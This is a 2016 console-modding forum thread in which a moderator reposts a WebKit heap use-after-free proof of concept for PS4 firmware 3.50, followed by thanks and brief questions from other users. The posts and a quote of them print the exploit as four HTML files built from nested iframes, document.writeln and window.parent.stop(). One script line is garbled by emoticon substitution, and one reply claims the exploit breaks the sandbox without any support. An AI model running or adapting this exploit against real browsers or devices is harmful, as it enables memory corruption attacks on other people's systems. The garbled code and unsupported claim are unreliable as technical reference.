Post: [RELEASE] heap use-after-free at WebCore - 3.50 Webkit Exploit POC by Hunter148
05-21-2016, 07:47 PM #1
Hydrogen
Super Mod
(adsbygoogle = window.adsbygoogle || []).push({}); That moment you're waiting for it to be released, but Red got it first Sal .. Credits to Hunter128 for releasing it publicly first, and credits to Red-EyeX32 for linking it on the ShoutBox. Here is the 3.50 Webkit PoC Release:

1.) Make an index.html

    <html>
<body onload='runTest()'>
<script>
function runTest(){
document.writeln('<html></html>'Winky Winky;
}
</script>
<iframe src='1.html'></iframe>
</body>
</html>


HTML #1
    <html>
<iframe src='2.html'></iframe>
<iframe src='3.html'></iframe>
</html>


HTML #2
    <html>
<script>
window.parent.stop();
</script>
</html>


HTML #3
    <html>
</html>


Cheers, Hydrogen Hi

Luv ya Red Sal


Source: Wololo; Releaser: Hunter148




Last edited by Hydrogen ; 05-22-2016 at 03:54 AM.

The following 6 users say thank you to Hydrogen for this useful post:

CodJumper:, DMAAR-7777, Kronoaxis, mishary-1212, Yolo Brahs !
05-21-2016, 07:48 PM #2
RTE
Keep it real!
The main man.... hunter128 :wub:

The following user thanked RTE for this useful post:

Yolo Brahs !
05-21-2016, 08:17 PM #3
Default Avatar
Kas
Guest
Originally posted by Hydrogen View Post
That moment you're waiiting for it to be released, but Red got it first Sal .. Credits to Hunter128 for the release, and credits to Red-EyeX32 for linking it on the ShoutBox.. Sal Here is the 3.50 Webkit PoC Release:

1.) Make an index.html

    <html>
<body onload='runTest()'>
<script>
function runTest(){
document.writeln('<html></html>'Winky Winky;
}
</script>
<iframe src='1.html'></iframe>
</body>
</html>


HTML #1
    <html>
<iframe src='2.html'></iframe>
<iframe src='3.html'></iframe>
</html>


HTML #2
    <html>
<script>
window.parent.stop();
</script>
</html>


HTML #3
    <html>
</html>


Cheers, Hydrogen Hi

Luv ya Red Sal



Source: Wololo; user: Hunter128






Thanks for sharing Smile
05-21-2016, 08:26 PM #4
SharkModding
Do a barrel roll!
hell yeah nice post bro
05-21-2016, 08:28 PM #5
Hydrogen
Super Mod
Originally posted by BLURRYFACE
wat is it


What is the 3.50 Webkit? Is that what you're asking?
05-21-2016, 08:31 PM #6
Hydrogen
Super Mod
Originally posted by BLURRYFACE
What is this entire thing :p I'm not into PS4 moddin' at all.


I explained to another user what the Webkit could do so i'll just show it here:

Originally Posted by xNIGHTMAREM0DZx:

but what can be done with it ?

Posted by Hydrogen: Webkit Exploits entry points; renders webpages in the browsers of mainly every console. It's a Open Source Layout Engine. Some firmwares of webkits are vulnerable to some stuff which can be very informative to other hackers in the scene if they publish it. From there, others can bite off their discoveries, and continue on finding things.
05-22-2016, 08:12 AM #7
shawncarnage
Little One
Renders? But does it break sandbox?
05-22-2016, 09:47 AM #8
Hydrogen
Super Mod
Originally posted by shawncarnage View Post
Renders? But does it break sandbox?


What are you talking about breaking sandbox lol? If you check my other thread, we already broke sandbox with the PoC.
05-22-2016, 01:05 PM #9
Forkbomb :P
05-22-2016, 05:52 PM #10
Kronoaxis
You talkin to me?
Originally posted by Hydrogod View Post
I explained to another user what the Webkit could do so i'll just show it here:

Originally Posted by xNIGHTMAREM0DZx:

but what can be done with it ?

Posted by Hydrogen: Webkit Exploits entry points; renders webpages in the browsers of mainly every console. It's a Open Source Layout Engine. Some firmwares of webkits are vulnerable to some stuff which can be very informative to other hackers in the scene if they publish it. From there, others can bite off their discoveries, and continue on finding things.


Isn't this only useful to web developers/web programmers though? If so, this isn't for me; I'm not very strong in web development as it's not my thing haha. Although it's still cool!

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo